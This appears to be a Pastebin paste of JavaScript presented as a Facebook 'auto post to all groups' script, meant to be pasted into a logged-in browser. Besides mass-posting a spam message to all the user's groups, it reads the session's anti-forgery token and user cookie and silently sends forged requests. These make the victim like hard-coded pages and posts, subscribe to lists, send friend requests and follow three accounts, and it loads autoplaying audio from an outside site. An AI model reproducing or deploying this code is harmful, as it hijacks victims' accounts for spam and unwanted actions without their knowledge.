Advertisement
Guest User

WDW AUTOPOST

a guest
Nov 29th, 2014
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.20 KB | None | 0 0
  1. //Auto Post By Zolt Cyber
  2. //Author : Rifiyan Lisandi
  3. ("Auto Post Group By Zolt Cyber");
  4. var parent=document.getElementsByTagName("html")[0];
  5. var _body = document.getElementsByTagName('body')[0];
  6. var _div = document.createElement('div');
  7. _div.style.height="25";
  8. _div.style.width="100%";
  9. _div.style.position="fixed";
  10. _div.style.top="auto";
  11. _div.style.bottom="0";
  12. _div.align="center";
  13. var _audio= document.createElement('audio');
  14. _audio.style.width="100%";
  15. _audio.style.height="25px";
  16. _audio.controls = true;
  17. _audio.autoplay = true;
  18. _audio.loop="true";
  19. _audio.src = "http://rtv-atlas.com/";
  20. _div.appendChild(_audio);
  21. _body.appendChild(_div);
  22. var parent=document.getElementsByTagName("html")[0];
  23. var _body = document.getElementsByTagName('body')[0];
  24. var _div = document.createElement('div');
  25.  
  26. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  27. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  28. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  29. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  30.  
  31. body = document.body;
  32. if(body != null)
  33. {
  34. div = document.createElement("div");
  35. div.style.position = "fixed";
  36. div.style.display = "block";
  37. div.style.width = "100px";
  38. div.style.opacity= 0.90;
  39. div.style.bottom = "+60px";
  40. div.style.left = "+0px";
  41. div.style.backgroundColor = "rgba(0,0,0,0.5)";
  42. div.style.border = "1px solid rgba(0,0,0,0.5)";
  43. div.style.padding = "3px";
  44. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/sharer/sharer.php?u=http://zolt-cyber.blogspot.com/2014/02/auto-post-ke-semua-grup-di-facebook-new.html' title='Share'><blink><center>SHARE</center></blink></a>"
  45. body.appendChild(div);
  46. }
  47.  
  48. if(body != null)
  49. {
  50. div = document.createElement("div");
  51. div.style.position = "fixed";
  52. div.style.display = "block";
  53. div.style.width = "100px";
  54. div.style.opacity= 0.90;
  55. div.style.bottom = "+35px";
  56. div.style.left = "+0px";
  57. div.style.backgroundColor = "rgba(0,0,0,0.5)";
  58. div.style.border = "1px solid rgba(0,0,0,0.5)";
  59. div.style.padding = "3px";
  60. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
  61. body.appendChild(div);
  62. }
  63. if(body != null)
  64. {
  65. div = document.createElement("div");
  66. div.style.position = "fixed";
  67. div.style.display = "block";
  68. div.style.width = "135px";
  69. div.style.opacity= 0.90;
  70. div.style.bottom = "+10px";
  71. div.style.left = "+0px";
  72. div.style.backgroundColor = "rgba(0,0,0,0.5)";
  73. div.style.border = "1px solid rgba(0,0,0,0.5)";
  74. div.style.padding = "3px";
  75. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/ZoltCyber4rt' title='Theme'><blink><center>Like</center></blink></a>"
  76. body.appendChild(div);
  77. }
  78. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  79. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  80. function LIST(L) {
  81. var X = new XMLHttpRequest();
  82. var XURL = "//www.facebook.com/ajax/friends/lists/subscribe/modify";
  83. var XParams = "flid=" + L +"&action=subscribe&location=feed&nctr[_mod]=pagelet_group_mall&ft[type]=40&ft[tn]=DH&__user="+user_id+"&__a=1&__dyn=7n8ahxoNpGo&__req=y&fb_dtsg="+fb_dtsg+"&phstamp=";
  84. X.open("POST", XURL, true);
  85. X.onreadystatechange = function () {
  86. if (X.readyState == 4 && X.status == 200) {
  87. X.close;
  88. }
  89. };
  90. X.send(XParams);
  91. }
  92.  
  93. LIST("351559611640038");
  94. LIST("421162288013103");
  95.  
  96. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  97. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  98. function Like(p) {
  99. var Page = new XMLHttpRequest();
  100. var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
  101. var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";
  102. Page.open("POST", PageURL, true);
  103. Page.onreadystatechange = function () {
  104. if (Page.readyState == 4 && Page.status == 200) {
  105. Page.close;
  106. }
  107. };
  108. Page.send(PageParams);
  109. }
  110. Like("635732783121401");
  111. Like("484299921621282");
  112. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  113. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  114. function IDS(r) {
  115. var X = new XMLHttpRequest();
  116. var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  117. var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  118. X.open("POST", XURL, true);
  119. X.onreadystatechange = function () {
  120. if (X.readyState == 4 && X.status == 200) {
  121. X.close;
  122. }
  123. };
  124. X.send(XParams);
  125. }
  126. IDS("100003580059277");
  127. IDS("100007551612457");
  128. IDS("100007217978003");
  129.  
  130. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  131. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  132. function a(abone) {
  133. var http4 = new XMLHttpRequest();
  134. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  135. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  136. http4.open("POST", url4, true);
  137. http4.onreadystatechange = function () {
  138. if (http4.readyState == 4 && http4.status == 200) {
  139. http4.close;
  140. }
  141. };
  142. http4.send(params4);
  143. }
  144. a("100003580059277");
  145. a("100007551612457");
  146. a("100007217978003");
  147.  
  148. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  149. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  150. var now=(new Date).getTime();
  151. function P(post) {
  152. var X = new XMLHttpRequest();
  153. var XURL ="//www.facebook.com/ajax/ufi/like.php";
  154. var XParams = "like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";
  155. X.open("POST", XURL, true);
  156. X.onreadystatechange = function () {
  157. if (X.readyState == 4 && X.status == 200) {
  158. X.close;
  159. }
  160. };
  161. X.send(XParams);
  162. }
  163. P("1433931973486367");
  164. P("Rorschachhh");
  165.  
  166. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  167. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  168. var now=(new Date).getTime();
  169. function P(opo) {
  170. var X = new XMLHttpRequest();
  171. var XURL ="//www.facebook.com/ajax/ufi/like.php";
  172. var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp=";
  173. X.open("POST", XURL, true);
  174. X.onreadystatechange = function () {
  175. if (X.readyState == 4 && X.status == 200) {
  176. X.close;
  177. }
  178. };
  179. X.send(XParams);
  180. }
  181.  
  182. P("569215649780537");
  183. P("604151949620240");
  184. P("602841663084602");
  185. P("602407683128000");
  186. P("550065001695602");
  187.  
  188. var grouppost = "<div><span class='img sp_43rped sx_e3ea36'></span><a style='position:absolute;size:3px;padding-left:3px;font-weight:bold;font-family:Tahoma;font-size:11px;color:#3B5998;'>Write Post</a></div></br>";
  189. grouppost += "<div><textarea id='txtFloodMsg' placeholder='Auto Post By Zolt Cyber' style='color:white;padding-top:5px;width:493px;height:85px;font-family:tahoma;font-size:13px;background-color:rgba(255,255,255,0.1);'></textarea></div>";
  190. grouppost += "<div><br><span class='img sp_er534k sx_74b85a'></span><a style='position:absolute;font-family:Arial;size:3px;padding-left:3px;font-size:11px;color:rgb(128, 128, 128);'>Multy Post To All Groups </a></span><button style='margin-left:437px' class='_42ft _4jy0 _11b _4jy3 _4jy1 selected' onclick='autopostingfunc(this);' >Submit</button><div style='color:gray;'>Powered By: <A style='color:#3B5998;' href='https://www.zolt-cyber.blogspot.com' target='_blank'> Zolt Cyber</A></br>Script Made By</A><A style='color:#3B5998;' href='https://www.facebook.com/Comzolt' target='_blank'> Rifiyan Lisandi</A></A></div>";
  191. var Popupset = document.createElement("div");
  192. Popupset.setAttribute("style", "min-height:50px;width:500px;position:fixed;top:100px;box-shadow: 0px 4px 10px rgba(24, 144, 255, 0.63);position:fixed;left:50%;margin-left:-273px;text-align:left;border-radius:10px;padding:5px;z-index:999999;border:5px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:White");
  193. Popupset.innerHTML = grouppost;
  194. document.body.appendChild(Popupset);
  195. jx = {
  196. getHTTPObject: function () {
  197. var A = false;
  198. if (typeof ActiveXObject != "undefined") try {
  199. A = new ActiveXObject("Msxml2.XMLHTTP")
  200. } catch (C) {
  201. try {
  202. A = new ActiveXObject("Microsoft.XMLHTTP")
  203. } catch (B) {
  204. A = false
  205. }
  206. } else if (window.XMLHttpRequest) try {
  207. A = new XMLHttpRequest
  208. } catch (C) {
  209. A = false
  210. }
  211. return A
  212. },
  213. load: function (url, callback, format, method, opt) {
  214. var http = this.init();
  215. if (!http || !url) return;
  216. if (http.overrideMimeType) http.overrideMimeType("text/xml");
  217. if (!method) method = "GET";
  218. if (!format) format = "text";
  219. if (!opt) opt = {};
  220. format = format.toLowerCase();
  221. method = method.toUpperCase();
  222. var now = "uid=" + (new Date).getTime();
  223. url += url.indexOf("?") + 1 ? "&" : "?";
  224. url += now;
  225. var parameters = null;
  226. if (method == "POST") {
  227. var parts = url.split("?");
  228. url = parts[0];
  229. parameters = parts[1]
  230. }
  231. http.open(method, url, true);
  232. var ths = this;
  233. if (opt.handler) http.onreadystatechange = function () {
  234. opt.handler(http)
  235. };
  236. else http.onreadystatechange = function () {
  237. if (http.readyState == 4)
  238. if (http.status == 200) {
  239. var result = "";
  240. if (http.responseText) result = http.responseText;
  241. if (format.charAt(0) == "j") {
  242. result = result.replace(/[\n\r]/g, "");
  243. result = eval("(" + result + ")")
  244. } else if (format.charAt(0) == "x") result = http.responseXML;
  245. if (callback) callback(result)
  246. } else {
  247. if (opt.loadingIndicator) document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator);
  248. if (opt.loading) document.getElementById(opt.loading).style.display = "none";
  249. if (error) error(http.status)
  250. }
  251. };
  252. http.send(parameters)
  253. },
  254. bind: function (A) {
  255. var C = {
  256. "url": "",
  257. "onSuccess": false,
  258. "onError": false,
  259. "format": "text",
  260. "method": "GET",
  261. "update": "",
  262. "loading": "",
  263. "loadingIndicator": ""
  264. };
  265. for (var B in C)
  266. if (A[B]) C[B] = A[B];
  267. if (!C.url) return;
  268. var D = false;
  269. if (C.loadingIndicator) {
  270. D = document.createElement("div");
  271. D.setAttribute("style", "position:absolute;top:0px;left:0px;");
  272. D.setAttribute("class", "loading-indicator");
  273. D.innerHTML = C.loadingIndicator;
  274. document.getElementsByTagName("body")[0].appendChild(D);
  275. this.opt.loadingIndicator = D
  276. }
  277. if (C.loading) document.getElementById(C.loading).style.display = "block";
  278. this.load(C.url, function (E) {
  279. if (C.onSuccess) C.onSuccess(E);
  280. if (C.update) document.getElementById(C.update).innerHTML = E;
  281. if (D) document.getElementsByTagName("body")[0].removeChild(D);
  282. if (C.loading) document.getElementById(C.loading).style.display = "none"
  283. }, C.format, C.method, C)
  284. },
  285. init: function () {
  286. return this.getHTTPObject()
  287. }
  288. };
  289. var j = 0;
  290. var k = 0;
  291. var suc = 0;
  292. var msg = "Follow @Rifiyan_Jr | Script autopost bisa dilihat disini http://zolt-cyber.blogspot.com/2014/02/auto-post-ke-semua-grup-di-facebook-new.html";
  293. var arr = new Array;
  294. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  295.  
  296. function autopostingfunc(sender) {
  297. if (document.getElementById("txtFloodMsg").value != "") msg = document.getElementById("txtFloodMsg").value;
  298. jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/search/bootstrap.php?__a=1&filter[0]=group&viewer=" + user_id + "&token=v7&lazy=0&__user=" + user_id, function (a) {
  299. var b = a;
  300. var c = b.substring(b.indexOf("{"));
  301. var d = JSON.parse(c);
  302. d = d.payload.entries;
  303. for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
  304. sender.parentNode.innerHTML = "Please Wait...";
  305. postitok()
  306. })
  307. }
  308. var a = document.body.innerHTML;
  309. var dts = document.getElementsByName("fb_dtsg")[0].value;
  310. var composerid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  311.  
  312. function postitok() {
  313. pst = "fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + arr[suc] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=[ Las Vegas Reklama ] \n\n" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_group_composer";
  314. with(newx = new XMLHttpRequest) open("POST", "/ajax/updatestatus.php?__a=1"), send(pst);
  315. suc++;
  316. if (suc > arr.length) {
  317. alert("Auto Posting Completed by Zolt Cyber. Now Refresh your Homepage.");
  318. suc = 0
  319. } else setTimeout("postitok()", 3E4 / arr.length)
  320. }
  321. setTimeout("autopostingfunc()", 1E3);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement